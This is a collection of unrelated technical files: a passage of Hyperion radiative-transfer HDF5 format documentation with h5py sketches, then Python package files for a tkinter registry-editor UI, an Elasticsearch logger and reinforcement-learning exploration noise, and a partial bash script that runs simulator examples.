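As an illustration, a point source with a temperature spectrum could be
written as follows (an ``h5py`` sketch; all values are placeholders)::

    import h5py

    with h5py.File('model.rtin', 'a') as f:
        src = f.require_group('Sources/source_00001')
        src.attrs['type'] = 'point'
        src.attrs['luminosity'] = 3.846e33  # erg/s, roughly 1 L_sun
        src.attrs['peeloff'] = 'yes'
        src.attrs['spectrum'] = 'temperature'
        src.attrs['temperature'] = 6000.
        # Point sources additionally need a position (see below).
        src.attrs['x'] = src.attrs['y'] = src.attrs['z'] = 0.
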
Point sources (``point``)
-------------------------
A group representing a point source should contain the following attributes in
addition to the `Common attributes`_ discussed above:
* ``x``, ``y``, and ``z``: the cartesian position of the source, as floating
point values, in cm
Spherical sources (``sphere``)
------------------------------
A group representing a spherical source should contain the following attributes
in addition to the `Common attributes`_ discussed above:
* ``x``, ``y``, and ``z``: the cartesian position of the center of the source,
as floating-point values, in cm
* ``r``: the radius of the sphere, as a floating point value, in cm
* ``limb``: whether to include limb darkening, as a string that can be either
``yes`` or ``no``.
.. TODO: mention spots
Diffuse sources (``map``)
-------------------------
In addition to the `Common attributes`_ discussed above, a group representing a diffuse source should contain a dataset called ``Luminosity map`` containing the relative luminosity of each cell as a 3-d array. The dimensions of the grid should be identical to the density grid (see `Grid`_).
External spherical sources (``extern_sph``)
-------------------------------------------
A group representing external illumination from a spherical source should
contain the following attributes in addition to the `Common attributes`_
discussed above:
* ``x``, ``y``, and ``z``: the cartesian position of the center of the source,
as floating-point values, in cm
* ``r``: the radius of the sphere, as a floating point value, in cm
External box sources (``extern_box``)
-------------------------------------
A group representing external illumination from a box source should contain the
following attributes in addition to the `Common attributes`_ discussed above:
* ``xmin``, ``xmax``, ``ymin``, ``ymax``, ``zmin``, ``zmax``: the lower and upper bounds defining the box, as floating-point values, in cm.
Plane parallel sources (``plane_parallel``)
-------------------------------------------
A group representing a plane-parallel beam source should contain the following
attributes in addition to the `Common attributes`_ discussed above:
* ``x``, ``y``, and ``z``: the cartesian position of the center of the source,
as floating-point values, in cm
* ``r``: the radius of the sphere, as a floating point value, in cm
* ``theta``, ``phi``: the 3-d angle giving the direction of the beam in
spherical polar coordinates, as floating point values, in degrees.
.. TODO: mention point source collection
Output
======
The ``Output`` group should have four attributes ``output_density``,
``output_density_diff``, ``output_n_photons``, and ``output_specific_energy``, which
should be set to a string to indicate whether to output the quantity after the
last iteration (``last``), after every iteration (``all``), or never
(``none``). The ``density_diff`` quantity is the density difference compared to
the input density (which will be non-zero in cases for example where one uses
dust sublimation).
In addition, the ``Output`` group should contain two sub-groups, ``Binned`` and
``Peeled``, that can be used to specify the parameters of the output
images/SEDs. Both groups should always be present, even if they are empty. The content of these groups is described in the following two sections:
Binned
------
If you want to compute images using binning of escaping photons (not
recommended in most cases as it is inefficient and causes angle-averaging of
outputs), then set the ``n_theta`` and ``n_phi`` parameters, which should be
used to indicate, as integers, the number of bins in the theta and phi
directions respectively.
Peeled
------
This group should contain as many sub-groups as image/SED sets you want to
compute (the name of the sub-groups is unimportant). Each sub-group should then
contain the following attributes:
* ``n_view``: the number of viewing angles for the image/SED, given as an
integer.
* ``compute_image``: whether to compute images, given as a string that can be
``yes`` or ``no``. If this is ``yes``, then the following attributes should
also be specified:
* ``n_x`` and ``n_y``: the dimensions of the image, as integers
* ``x_min``, ``x_max``, ``y_min``, and ``y_max``: the lower and upper bounds
of the image as floating point values, in cm
* ``compute_sed``: whether to compute SEDs, given as a string that can be
``yes`` or ``no``. If this is ``yes``, then the following attributes should
also be specified:
* ``n_ap``: the number of apertures to compute the SED for
* ``ap_min``, ``ap_max``: the smallest and largest apertures to use. If
``n_ap`` is 1, then ``ap_min`` should be the same as ``ap_max``.
* ``track_origin``: indicates whether the origin of the photon (e.g. emission
vs scattering, or which source it originated from) should be retained in the
output image. This can be:
* ``no``: no photon tracking is done
* ``basic``: photons are split into ones emitted or scattered, and whether
they were last emitted from a source or from the dust.
* ``detailed``: as for ``basic``, but also keeping the ID of the source or
dust population last emitted from.
* ``scatterings``: photons are split into ones emitted by sources or dust,
and split by the number of times they scatter.
* ``track_n_scat``: an integer giving the maximum number of scatterings to
record if ``track_origin`` is set to ``scatterings``.
* ``uncertainties``: whether to compute and output uncertainties on the images
and/or SEDs. This should be specified as a string that can be ``yes`` or
``no``.
* ``n_wav``: the number of wavelengths/frequencies to compute the images and/or
SEDs for.
* If using monochromatic radiative transfer, then the minimum and maximum
frequency of the image and/or SED should be specified with two attributes
``inu_min`` and ``inu_max``, which should be given as integers giving the
indices to the ``frequencies`` array (the first array element should be 1).
* If not using monochromatic radiative transfer, then the minimum and maximum
wavelengths of the image and/or SED should be specified with two attributes
``wav_min`` and ``wav_max``, which should be given as floating point
values, in microns.
* ``d_min`` and ``d_max``: these give the minimum and maximum depth within which
to use photons for the image/SED. Unless you need this and understand the
implications, you should set this to ``-inf`` and ``+inf`` respectively if
``inside_observer`` is ``no``, and ``0`` and ``+inf`` respectively if
``inside_observer`` is ``yes``.
* ``inside_observer``: whether to compute the image from an observer located
inside the grid, or from an observer at infinity. This should be given as a
string that can be either ``yes`` or ``no``. In most cases you will likely
want to use ``no``.
* ``ignore_optical_depth``: whether to ignore optical depth effects when
computing the image/SED. This should be given as a string that can be either
``yes`` or ``no``, and should be set to ``no`` in most cases. This can be
useful for debugging and for understanding how much optical depth effects are
affecting an image or SED.
* If ``inside_observer`` is ``yes``, then the position of the observer should
be given with the ``observer_x``, ``observer_y``, and ``observer_z``
attributes, as floating point values, in cm.
* If ``inside_observer`` is ``no``, then the origin for the peeling-off should
be given with the ``peeloff_x``, ``peeloff_y``, and ``peeloff_z`` attributes,
as floating point values, in cm. In most cases, these should be set to zero.
In addition, the group should contain a table dataset with two columns,
``theta`` and ``phi``, giving the viewing angles as floating point values, in
degrees.
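
Putting the pieces above together, a minimal SED-only peeled group might look
like this (an ``h5py``/``numpy`` sketch; the values are placeholders, and the
name of the viewing-angle table, ``angles``, is assumed here)::

    import h5py
    import numpy as np

    with h5py.File('model.rtin', 'a') as f:
        group = f.require_group('Output/Peeled/group_00001')
        group.attrs['n_view'] = 1
        group.attrs['compute_image'] = 'no'
        group.attrs['compute_sed'] = 'yes'
        group.attrs['n_ap'] = 1
        group.attrs['ap_min'] = group.attrs['ap_max'] = 1e17  # cm
        group.attrs['track_origin'] = 'no'
        group.attrs['uncertainties'] = 'no'
        group.attrs['n_wav'] = 100
        group.attrs['wav_min'], group.attrs['wav_max'] = 0.01, 5000.  # microns
        group.attrs['d_min'], group.attrs['d_max'] = -np.inf, np.inf
        group.attrs['inside_observer'] = 'no'
        group.attrs['ignore_optical_depth'] = 'no'
        group.attrs['peeloff_x'] = 0.
        group.attrs['peeloff_y'] = 0.
        group.attrs['peeloff_z'] = 0.
        # One viewing angle, stored as a two-column table.
        angles = np.zeros(1, dtype=[('theta', 'f8'), ('phi', 'f8')])
        angles['theta'], angles['phi'] = 45., 0.
        group.create_dataset('angles', data=angles)
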
Root-level attributes
=====================
The overall configuration for the model should be specified as attributes for the root group in the HDF5 file. The parameters needed are described in the following sub-sections.
General
-------
* ``python_version``: the version of the Hyperion Python library used to
generate the file. If you are not generating the file with the Hyperion
Python library (which is probably the case if you are reading this page)
then set it to '0.8.7' since that is the version for which the format in
this page is described.
* ``physics_io_bytes``: whether to write out the physical quantities using
4- or 8-byte floating point values. Should be either ``4`` or ``8``
(integer).
Iterations
----------
* ``n_lucy_iter``: Number of temperature-calculating Lucy iterations
(integer)
* ``check_convergence``: Whether to check for convergence in the specific
energy calculation. Should be ``yes`` or ``no`` (string).
* ``convergence_absolute``: the threshold for absolute changes in the
specific energy (float).
* ``convergence_relative``: the threshold for relative changes in the
specific energy (float).
* ``convergence_percentile``: the percentile at which to check the absolute
and relative changes in the specific energy (float).
See :ref:`convergence` for the latter three.
Diffusion approximation
-----------------------
* ``mrw``: Whether or not to use the modified random walk (MRW) algorithm.
Should be ``yes`` or ``no`` (string).
* ``pda``: Whether or not to use the partial diffusion approximation (PDA)
algorithm. Should be ``yes`` or ``no`` (string).
If ``mrw`` is ``yes``, the following two attributes should be set:
* ``mrw_gamma``: The gamma parameter for the modified random walk as
described in :ref:`diffusion` (float).
* ``n_inter_mrw_max``: The maximum number of MRW interactions before a
photon is killed (integer).
Images/SEDs
-----------
* ``raytracing``: Whether to do a raytracing iteration at the end of
the calculation. Should be ``yes`` or ``no`` (string).
* ``monochromatic``: Whether to calculate the images/SEDs in monochromatic
mode. Should be ``yes`` or ``no`` (string).
Number of photons
-----------------
The following attributes are required:
* ``n_stats``: how often to display performance stats. For the MPI-enabled
code, this also determines the chunk of photons to dispatch to each thread
at a time (integer).
If ``n_lucy_iter`` is non-zero, then the following photon number should be specified:
* ``n_initial_photons``: number of photons to emit per iteration in the
initial iterations (integer).
If ``raytracing`` is ``yes``, then the following photon numbers should be specified:
* ``n_ray_photons_sources``: number of raytracing photons from sources
(integer). Does not need to be specified if there are no sources.
* ``n_ray_photons_dust``: number of raytracing photons from dust (integer).
Does not need to be specified if there are no dust density grids.
If ``monochromatic`` is ``yes``, then the following photon numbers should be specified:
* ``n_last_photons_sources``: the number of photons (per frequency) to emit
from sources in the imaging iteration (integer). Does not need to be
specified if there are no sources.
* ``n_last_photons_dust``: the number of photons (per frequency) to emit
from dust in the imaging iteration (integer). Does not need to be
specified if there are no dust density grids.
Miscellaneous
-------------
* ``forced_first_interaction``: whether to use the forced first interaction
algorithm. Should be one of ``yes`` or ``no`` (string).
* ``kill_on_absorb``: whether to kill photons when they are absorbed rather
than re-emitting them (useful for scattering-only calculations). Should be
one of ``yes`` or ``no`` (string).
* ``n_inter_max``: the maximum number of interactions a photon can have
  before it is killed (integer).
* ``n_reabs_max``: the maximum number of times a photon can be re-absorbed
before it is killed (integer).
Optional
--------
The following attributes are optional:
* ``sample_sources_evenly``: whether to emit the same number of photons from
each source (as opposed to emitting a number of photons proportional to
the luminosity). Should be ``yes`` or ``no`` (string). Defaults to ``no``.
* ``enforce_energy_range``: whether to always reset values below the minimum
and above the maximum specific energy to the bounds of the range. Should
be ``yes`` or ``no`` (string). Defaults to ``yes``.
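
Putting this together, a sketch setting the root-level attributes for a simple
model (``h5py``; the photon numbers are placeholders, and ``raytracing`` and
``monochromatic`` are both disabled so no raytracing or monochromatic photon
numbers are needed)::

    import h5py

    with h5py.File('model.rtin', 'a') as f:
        f.attrs['python_version'] = '0.8.7'
        f.attrs['physics_io_bytes'] = 8
        f.attrs['n_lucy_iter'] = 5
        f.attrs['check_convergence'] = 'no'
        f.attrs['mrw'] = 'no'
        f.attrs['pda'] = 'no'
        f.attrs['raytracing'] = 'no'
        f.attrs['monochromatic'] = 'no'
        f.attrs['n_stats'] = 10000
        f.attrs['n_initial_photons'] = 100000
        f.attrs['forced_first_interaction'] = 'yes'
        f.attrs['kill_on_absorb'] = 'no'
        f.attrs['n_inter_max'] = 1000000
        f.attrs['n_reabs_max'] = 1000000
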
/AoikRegistryEditor-0.1.0-py3-none-any.whl/aoikregistryeditor/ui_config.py | from __future__ import absolute_import
import os.path
from tkinter import PhotoImage
from tkinter.ttk import Sizegrip
from tkinter.ttk import Style
import aoikregistryeditor.static
#
def configure_ui(info):
"""
UI config function.
@param info: UI config info dict.
@return: None.
"""
# Background color
bg_color = 'white smoke'
# Create ttk style object
STYLE = Style()
# Configure TFrame style's background
STYLE.configure(
'TFrame',
background=bg_color,
)
# Configure TLabelframe style's background
STYLE.configure(
'TLabelframe',
background=bg_color,
)
# Configure TLabelframe.Label style's background
STYLE.configure(
'TLabelframe.Label',
background=bg_color,
)
# Configure TLabel style's background
STYLE.configure(
'TLabel',
background=bg_color,
)
# Configure TRadiobutton style's background
STYLE.configure(
'TRadiobutton',
background=bg_color,
)
# Get TK root window
tk = info['tk']
# Set window title
tk.title('AoikRegistryEditor')
# Set window geometry
tk.geometry('1280x720')
# Configure layout weights for children.
# Row 0 is for registry editor.
tk.rowconfigure(0, weight=1)
# Row 1 is for status bar
tk.rowconfigure(1, weight=0)
# Use only one column
tk.columnconfigure(0, weight=1)
# Get menu tree
menutree = info['menutree']
# Add `File` menu
menutree.add_menu(pid='/', id='File', index=0)
# Add `Exit` command
menutree.add_command(pid='/File', id='Exit', command=tk.quit)
# Get status bar label
status_bar_label = info['status_bar_label']
# Set status bar label's main frame's height
status_bar_label.widget().config(height=20)
# Set status bar label's background
status_bar_label.config(background='#F0F0F0')
# Lay out the status bar label
status_bar_label.grid(
in_=tk,
row=2,
column=0,
sticky='NSEW',
padx=(5, 0),
)
# Create size grip
sizegrip = Sizegrip(master=tk)
# Lay out the size grip
sizegrip.grid(
in_=tk,
row=2,
column=0,
sticky='E',
)
# Get registry editor
editor = info['editor']
# Lay out the registry editor
editor.grid(
row=0,
column=0,
sticky='NSEW',
)
# Set registry editor's inner padding
editor.config(padding=10)
# Get path bar label
path_bar_label = info['path_bar_label']
# Get static files' directory path
static_dir = os.path.dirname(
os.path.abspath(aoikregistryeditor.static.__file__)
)
# Get path bar label's normal state image file path
image_path = os.path.join(static_dir, 'path_bar_label_normal.png')
# Load path bar label's normal state image file
path_bar_label._normal_image = PhotoImage(file=image_path)
# Get path bar label's disabled state image file path
image_path = os.path.join(static_dir, 'path_bar_label_disabled.png')
# Load path bar label's disabled state image file
path_bar_label._disabled_image = PhotoImage(file=image_path)
# Set path bar label's images
path_bar_label.config(
image=(
path_bar_label._normal_image,
'disabled', path_bar_label._disabled_image,
)
)
# Get path bar textfield
path_bar = info['path_bar']
# Set path bar textfield's font
path_bar.config(font=('Consolas', 12))
# Set path bar textfield's outer padding
path_bar.grid(padx=(3, 0))
# Get child keys labelframe
child_keys_labelframe = info['child_keys_labelframe']
# Set child keys labelframe's outer padding
child_keys_labelframe.grid(pady=(5, 0))
# Set child keys labelframe's inner padding
child_keys_labelframe.config(padding=5)
# Get child keys listbox
child_keys_listbox = info['child_keys_listbox']
# Set child keys listbox's font
child_keys_listbox.config(font=('Consolas', 12))
# Get fields labelframe
fields_labelframe = info['fields_labelframe']
# Set fields labelframe's outer padding
fields_labelframe.grid(padx=(10, 0), pady=(5, 0))
# Set fields labelframe's inner padding
fields_labelframe.config(padding=5)
# Get fields listbox
fields_listbox = info['fields_listbox']
# Set fields listbox's font
fields_listbox.config(font=('Consolas', 12))
# Create event handler to set fields listbox background
def _fields_listbox_set_background():
# If fields listbox is not empty
if fields_listbox.size() > 0:
# Set background color for non-empty listbox
fields_listbox.config(background='white')
# If fields listbox is empty
else:
# Set background color for empty listbox
fields_listbox.config(background='gainsboro')
# Call the event handler to initialize the background color
_fields_listbox_set_background()
# Add the event handler to fields listbox
fields_listbox.handler_add(
fields_listbox.ITEMS_CHANGE_DONE,
_fields_listbox_set_background
)
# Get field editor labelframe
field_editor_labelframe = info['field_editor_labelframe']
# Set field editor labelframe's outer padding
field_editor_labelframe.grid(padx=(10, 0), pady=(5, 0))
# Set field editor labelframe's inner padding
field_editor_labelframe.config(padding=5)
# Get field add label
field_add_label = info['field_add_label']
# Set field add label's main frame size
field_add_label.widget().config(width=40, height=40)
# Get field add label's normal state image file path
image_path = os.path.join(static_dir, 'field_add_normal.png')
# Load field add label's normal state image file
field_add_label._normal_image = PhotoImage(file=image_path)
# Get field add label's active state image file path
image_path = os.path.join(static_dir, 'field_add_active.png')
# Load field add label's active state image file
field_add_label._active_image = PhotoImage(file=image_path)
# Get field add label's hover state image file path
image_path = os.path.join(static_dir, 'field_add_hover.png')
# Load field add label' hover state image file
field_add_label._hover_image = PhotoImage(file=image_path)
# Set field add label's images.
# Notice `disabled` state is excluded from other states.
# Notice `active` state takes precedence over `hover` state.
field_add_label.config(
image=(
field_add_label._normal_image,
'!disabled active', field_add_label._active_image,
'!disabled hover', field_add_label._hover_image,
)
)
# Get field delete label
field_del_label = info['field_del_label']
# Set field delete label's main frame size
field_del_label.widget().config(width=40, height=40)
# Get field delete label's normal state image file path
image_path = os.path.join(static_dir, 'field_del_normal.png')
# Load field delete label's normal state image file
field_del_label._normal_image = PhotoImage(file=image_path)
# Get field delete label's active state image file path
image_path = os.path.join(static_dir, 'field_del_active.png')
# Load field delete label's active state image file
field_del_label._active_image = PhotoImage(file=image_path)
# Get field delete label's hover state image file path
image_path = os.path.join(static_dir, 'field_del_hover.png')
# Load field delete label's hover state image file
field_del_label._hover_image = PhotoImage(file=image_path)
# Set field delete label's images.
# Notice `disabled` state is excluded from other states.
# Notice `active` state takes precedence over `hover` state.
field_del_label.config(
image=(
field_del_label._normal_image,
'!disabled active', field_del_label._active_image,
'!disabled hover', field_del_label._hover_image,
)
)
# Get field load label
field_load_label = info['field_load_label']
# Set field load label's main frame size
field_load_label.widget().config(width=40, height=40)
# Get field load label's normal state image file path
image_path = os.path.join(static_dir, 'field_load_normal.png')
# Load field load label's normal state image file
field_load_label._normal_image = PhotoImage(file=image_path)
# Get field load label's active state image file path
image_path = os.path.join(static_dir, 'field_load_active.png')
# Load field load label's active state image file
field_load_label._active_image = PhotoImage(file=image_path)
# Get field load label's hover state image file path
image_path = os.path.join(static_dir, 'field_load_hover.png')
# Load field load label's hover state image file
field_load_label._hover_image = PhotoImage(file=image_path)
# Set field load label's images.
# Notice `disabled` state is excluded from other states.
# Notice `active` state takes precedence over `hover` state.
field_load_label.config(
image=(
field_load_label._normal_image,
'!disabled active', field_load_label._active_image,
'!disabled hover', field_load_label._hover_image,
)
)
# Get field save label
field_save_label = info['field_save_label']
# Set field save label's main frame size
field_save_label.widget().config(width=40, height=40)
# Get field save label's normal state image file path
image_path = os.path.join(static_dir, 'field_save_normal.png')
# Load field save label's normal state image file
field_save_label._normal_image = PhotoImage(file=image_path)
# Get field save label's active state image file path
image_path = os.path.join(static_dir, 'field_save_active.png')
# Load field save label's active state image file
field_save_label._active_image = PhotoImage(file=image_path)
# Get field save label's hover state image file path
image_path = os.path.join(static_dir, 'field_save_hover.png')
# Load field save label's hover state image file
field_save_label._hover_image = PhotoImage(file=image_path)
# Set field save label's images.
# Notice `disabled` state is excluded from other states.
# Notice `active` state takes precedence over `hover` state.
field_save_label.config(
image=(
field_save_label._normal_image,
'!disabled active', field_save_label._active_image,
'!disabled hover', field_save_label._hover_image,
)
)
# Get field add dialog
field_add_dialog = info['field_add_dialog']
# Set field add dialog's geometry
field_add_dialog.toplevel().geometry('300x110')
# Set field add dialog to not resizable
field_add_dialog.toplevel().resizable(width=False, height=False)
# Set field add dialog's background
field_add_dialog.toplevel().config(background=bg_color)
# Set field add dialog's main frame's outer padding
field_add_dialog.main_frame().grid(padx=5, pady=5)
# Set field add dialog's confirm button's outer padding
field_add_dialog.confirm_button().grid(pady=(15, 0))
# Set field add dialog's cancel button's outer padding
field_add_dialog.cancel_button().grid(pady=(15, 0))
# Set field add dialog's field add type label's outer padding
editor._field_add_type_label.grid(
pady=(10, 0),
)
# Set field add dialog's field add type radio buttons frame's outer padding
editor._field_add_type_rbuttons_frame.grid(
padx=(3, 0),
pady=(10, 0),
) | PypiClean |
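
# --- Illustrative helper (not part of the original module). The four
# field_* labels above repeat the same load-three-images pattern; a helper
# like this sketch could factor it out. It assumes the same
# "<name>_{normal,active,hover}.png" naming convention used above.
def _load_state_images(label, static_dir, name):
    """Load normal/active/hover images for `label` and map them to states."""
    label._normal_image = PhotoImage(
        file=os.path.join(static_dir, '%s_normal.png' % name))
    label._active_image = PhotoImage(
        file=os.path.join(static_dir, '%s_active.png' % name))
    label._hover_image = PhotoImage(
        file=os.path.join(static_dir, '%s_hover.png' % name))
    # `active` precedes `hover` so it takes precedence, as in the code above.
    label.config(image=(
        label._normal_image,
        '!disabled active', label._active_image,
        '!disabled hover', label._hover_image,
    ))
# Usage (e.g. inside configure_ui):
#     _load_state_images(field_add_label, static_dir, 'field_add')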
# File: /Elastic_logger-1.0.7-py3-none-any.whl/elasticlogger/elastic.py
from datetime import datetime
import jsonpickle
from elasticsearch import Elasticsearch
import threading
import os
from dotenv import load_dotenv
load_dotenv(verbose=False)
class Elastic():
elastic_logger_host = os.getenv("elkHost")
elastic_logger_port = os.getenv("elkPort")
    # note: bool("false") is True, so parse the flag explicitly
    elastic_logger_auth_enable = str(os.getenv("elkAuthEnable")).lower() in ("1", "true", "yes")
elastic_logger_auth_user = os.getenv("elkAuthUser")
elastic_logger_auth_password = os.getenv("elkAuthPassword")
def __init__(self, _id, _index_name, _index_name_day):
self.index_name = _index_name
self.index_name_day = _index_name_day
self.id = _id
if (not self.elastic_logger_host):
self.elastic_logger_host = ["http://localhost"]
else:
self.elastic_logger_host = str(self.elastic_logger_host).split(",")
if (not self.elastic_logger_port):
self.elastic_logger_port = 9200
if (not self.elastic_logger_auth_enable):
self.elastic_logger_auth_enable = False
if (self.elastic_logger_auth_enable and self.elastic_logger_auth_user and self.elastic_logger_auth_password):
            self.es = Elasticsearch(hosts=self.elastic_logger_host, port=self.elastic_logger_port,
                                    http_auth=(self.elastic_logger_auth_user, self.elastic_logger_auth_password))
else:
self.es = Elasticsearch(hosts=self.elastic_logger_host, port=self.elastic_logger_port)
def post(self, severity, message, args):
try:
body = {"requestId": self.id, "message": message, "@timestamp": datetime.now(),
"application": self.index_name}
if (severity):
body["severity"] = str(severity)
if (args):
body["args"] = args
self.es.index(index=self.index_name_day, doc_type="logs", body=body)
except Exception as e:
print("Elasticsearch unavaliable")
print("An exception occurred [" + jsonpickle.encode(e) + " ]")
pass
def asyncPost(self, severity, message, args):
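        # Fire-and-forget: run post() on a background thread so the caller is not blocked.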
threading.Thread(target=self.post, args=(severity, message, args)).start() | PypiClean |
/DI_engine-0.4.9-py3-none-any.whl/ding/rl_utils/exploration.py | import math
from abc import ABC, abstractmethod
from typing import Callable, Union, Optional
from copy import deepcopy
from ding.torch_utils.data_helper import to_device
import torch
def get_epsilon_greedy_fn(start: float, end: float, decay: int, type_: str = 'exp') -> Callable:
"""
Overview:
        Generate an epsilon-greedy schedule with decay: the returned function maps the current timestep to the current epsilon.
Arguments:
- start (:obj:`float`): Epsilon start value. For 'linear', it should be 1.0.
- end (:obj:`float`): Epsilon end value.
- decay (:obj:`int`): Controls the speed that epsilon decreases from ``start`` to ``end``. \
We recommend epsilon decays according to env step rather than iteration.
- type (:obj:`str`): How epsilon decays, now supports ['linear', 'exp'(exponential)]
Returns:
- eps_fn (:obj:`function`): The epsilon greedy function with decay
"""
assert type_ in ['linear', 'exp'], type_
if type_ == 'exp':
return lambda x: (start - end) * math.exp(-1 * x / decay) + end
elif type_ == 'linear':
def eps_fn(x):
if x >= decay:
return end
else:
return (start - end) * (1 - x / decay) + end
return eps_fn
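# Illustrative sketch (not part of the original module): with the default
# exponential schedule, epsilon decays from ``start`` toward ``end`` with time
# constant ``decay``; the numbers below are example values, not defaults.
#   eps_fn = get_epsilon_greedy_fn(start=0.95, end=0.05, decay=10000)
#   eps_fn(0)        # 0.95
#   eps_fn(10000)    # (0.95 - 0.05) * e**-1 + 0.05 ~= 0.38
#   eps_fn(10**6)    # ~= 0.05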
class BaseNoise(ABC):
r"""
Overview:
Base class for action noise
Interface:
__init__, __call__
Examples:
>>> noise_generator = OUNoise() # init one type of noise
>>> noise = noise_generator(action.shape, action.device) # generate noise
"""
def __init__(self) -> None:
"""
Overview:
Initialization method
"""
super().__init__()
@abstractmethod
def __call__(self, shape: tuple, device: str) -> torch.Tensor:
"""
Overview:
Generate noise according to action tensor's shape, device
Arguments:
- shape (:obj:`tuple`): size of the action tensor, output noise's size should be the same
- device (:obj:`str`): device of the action tensor, output noise's device should be the same as it
Returns:
            - noise (:obj:`torch.Tensor`): generated action noise, \
                with the same shape and device as the input action tensor
"""
raise NotImplementedError
class GaussianNoise(BaseNoise):
r"""
Overview:
Derived class for generating gaussian noise, which satisfies :math:`X \sim N(\mu, \sigma^2)`
Interface:
__init__, __call__
"""
def __init__(self, mu: float = 0.0, sigma: float = 1.0) -> None:
"""
Overview:
Initialize :math:`\mu` and :math:`\sigma` in Gaussian Distribution
Arguments:
- mu (:obj:`float`): :math:`\mu` , mean value
- sigma (:obj:`float`): :math:`\sigma` , standard deviation, should be positive
"""
super(GaussianNoise, self).__init__()
self._mu = mu
        assert sigma >= 0, "GaussianNoise's sigma should be non-negative."
self._sigma = sigma
def __call__(self, shape: tuple, device: str) -> torch.Tensor:
"""
Overview:
Generate gaussian noise according to action tensor's shape, device
Arguments:
- shape (:obj:`tuple`): size of the action tensor, output noise's size should be the same
- device (:obj:`str`): device of the action tensor, output noise's device should be the same as it
Returns:
            - noise (:obj:`torch.Tensor`): generated action noise, \
                with the same shape and device as the input action tensor
"""
noise = torch.randn(shape, device=device)
noise = noise * self._sigma + self._mu
return noise
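# Illustrative sketch (not part of the original module): generating Gaussian
# action noise on CPU; the shape is an arbitrary example.
#   noise_gen = GaussianNoise(mu=0.0, sigma=0.1)
#   noise = noise_gen((4, 2), 'cpu')   # tensor of shape (4, 2), drawn from N(0, 0.1**2)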
class OUNoise(BaseNoise):
r"""
Overview:
Derived class for generating Ornstein-Uhlenbeck process noise.
Satisfies :math:`dx_t=\theta(\mu-x_t)dt + \sigma dW_t`,
        where :math:`W_t` denotes the Wiener process, acting as a random perturbation term.
Interface:
__init__, reset, __call__
"""
def __init__(
self,
mu: float = 0.0,
sigma: float = 0.3,
theta: float = 0.15,
dt: float = 1e-2,
x0: Optional[Union[float, torch.Tensor]] = 0.0,
) -> None:
"""
Overview:
            Initialize ``_alpha`` :math:`= \theta \cdot dt` and
            ``_beta`` :math:`= \sigma \cdot \sqrt{dt}` in the Ornstein-Uhlenbeck process
Arguments:
- mu (:obj:`float`): :math:`\mu` , mean value
- sigma (:obj:`float`): :math:`\sigma` , standard deviation of the perturbation noise
- theta (:obj:`float`): how strongly the noise reacts to perturbations, \
greater value means stronger reaction
- dt (:obj:`float`): derivative of time t
- x0 (:obj:`float` or :obj:`torch.Tensor`): initial action
"""
super().__init__()
self._mu = mu
self._alpha = theta * dt
self._beta = sigma * math.sqrt(dt)
self._x0 = x0
self.reset()
def reset(self) -> None:
"""
Overview:
Reset ``_x`` to the initial state ``_x0``
"""
self._x = deepcopy(self._x0)
def __call__(self, shape: tuple, device: str, mu: Optional[float] = None) -> torch.Tensor:
"""
Overview:
            Generate Ornstein-Uhlenbeck noise according to the action tensor's shape and device
Arguments:
- shape (:obj:`tuple`): size of the action tensor, output noise's size should be the same
- device (:obj:`str`): device of the action tensor, output noise's device should be the same as it
- mu (:obj:`float`): new mean value :math:`\mu`, you can set it to `None` if don't need it
Returns:
            - noise (:obj:`torch.Tensor`): generated action noise, \
                with the same shape and device as the input action tensor
"""
if self._x is None or \
(isinstance(self._x, torch.Tensor) and self._x.shape != shape):
self._x = torch.zeros(shape)
if mu is None:
mu = self._mu
noise = self._alpha * (mu - self._x) + self._beta * torch.randn(shape)
self._x += noise
noise = to_device(noise, device)
return noise
@property
def x0(self) -> Union[float, torch.Tensor]:
return self._x0
@x0.setter
def x0(self, _x0: Union[float, torch.Tensor]) -> None:
"""
Overview:
Set ``self._x0`` and reset ``self.x`` to ``self._x0`` as well
"""
self._x0 = _x0
self.reset()
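# Illustrative sketch (not part of the original module): OU noise keeps internal
# state across calls, so reset() should be called at trajectory boundaries.
#   ou = OUNoise(mu=0.0, sigma=0.3, theta=0.15, dt=1e-2)
#   n1 = ou((4, 2), 'cpu')   # first step of the correlated process
#   n2 = ou((4, 2), 'cpu')   # correlated with n1 through the internal state
#   ou.reset()               # start a fresh trajectory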
noise_mapping = {'gauss': GaussianNoise, 'ou': OUNoise}
def create_noise_generator(noise_type: str, noise_kwargs: dict) -> BaseNoise:
"""
Overview:
        Given the key (noise_type), create a new noise generator instance if the key is in ``noise_mapping``,
        or raise a KeyError. In other words, a derived noise generator must first register,
        then call ``create_noise_generator`` to get the instance object.
    Arguments:
        - noise_type (:obj:`str`): the type of noise generator to be created
        - noise_kwargs (:obj:`dict`): keyword arguments passed to the noise generator's constructor
Returns:
- noise (:obj:`BaseNoise`): the created new noise generator, should be an instance of one of \
noise_mapping's values
"""
if noise_type not in noise_mapping.keys():
raise KeyError("not support noise type: {}".format(noise_type))
else:
return noise_mapping[noise_type](**noise_kwargs) | PypiClean |
/aimm_simulator-2.0.3.tar.gz/aimm_simulator-2.0.3/examples/run_all_examples.sh |
#!/bin/bash
PLOTTER="./src/realtime_plotter.py"
# do-nothing example - no output expected...
python3 examples/AIMM_simulator_example_n0.py
rc=$?   # capture the exit status before testing it; the test itself resets $?
if [ $rc -ne 0 ]
then
  echo "AIMM_simulator_example_n0.py failed with exit code $rc - quitting!"
  exit 1
fi
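# (Optional refactor sketch, not used below: a helper that captures the exit
# status once and quits on failure, to avoid repeating each check by hand.)
# run_example() {
#   python3 "$1"
#   rc=$?
#   if [ $rc -ne 0 ]; then
#     echo "$1 failed with exit code $rc - quitting!"
#     exit 1
#   fi
# }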
# Tutorial example 1...
python3 examples/AIMM_simulator_example_n1.py
if [ $? -ne 0 ]
then
echo "AIMM_simulator_example_n1.py failed - quitting!"
exit 1
fi
# Tutorial example 2...
python3 examples/AIMM_simulator_example_n2.py
if [ $? -ne 0 ]
then
echo "AIMM_simulator_example_n2.py failed - quitting!"
exit 1
fi
# Tutorial example 3...
python3 examples/AIMM_simulator_example_n3.py
if [ $? -ne 0 ]
then
echo "AIMM_simulator_example_n3.py failed - quitting!"
exit 1
fi
# Tutorial example 3a...
python3 examples/AIMM_simulator_example_n3a.py
if [ $? -ne 0 ]
then
echo "AIMM_simulator_example_n3a.py failed - quitting!"
exit 1
fi
# Tutorial example 4...
python3 examples/AIMM_simulator_example_n4.py
if [ $? -ne 0 ]
then
echo "AIMM_simulator_example_n4.py failed - quitting!"
exit 1
fi
# Tutorial example 5...
